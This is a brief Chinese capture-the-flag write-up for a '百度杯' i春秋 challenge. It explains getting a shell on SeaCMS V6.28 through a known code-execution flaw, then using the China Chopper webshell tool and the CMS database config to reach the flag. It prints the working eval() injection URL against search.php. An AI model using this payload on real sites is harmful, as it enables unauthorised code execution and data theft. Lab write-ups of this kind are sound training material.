题目在i春秋ctf训练营又是一道cms的通用漏洞的题，直接去百度查看通用漏洞这里我使用的是以下这个漏洞：海洋CMS V6.28代码执行0day按照给出的payload，直接访问url+/search.php?searchtype=5&tid=&area=eval($_POST@[1])之后用菜刀连接，但乍一看并没有flag.php

“百度杯”CTF比赛 九月场_Test（海洋cms前台getshell）-1.png

1.png

反手去查了一下海洋cms的数据库配置文件的存放地址：

2.png

出去用菜刀连接数据库

3.png

“百度杯”CTF比赛 九月场_Test（海洋cms前台getshell）-2.png

编辑完成后右键数据库管理，可以看到flag了

4.png

上一篇：海洋cms的模板安装

下一篇：海洋cms通用的百度主动推送工具苹果cms和海洋cms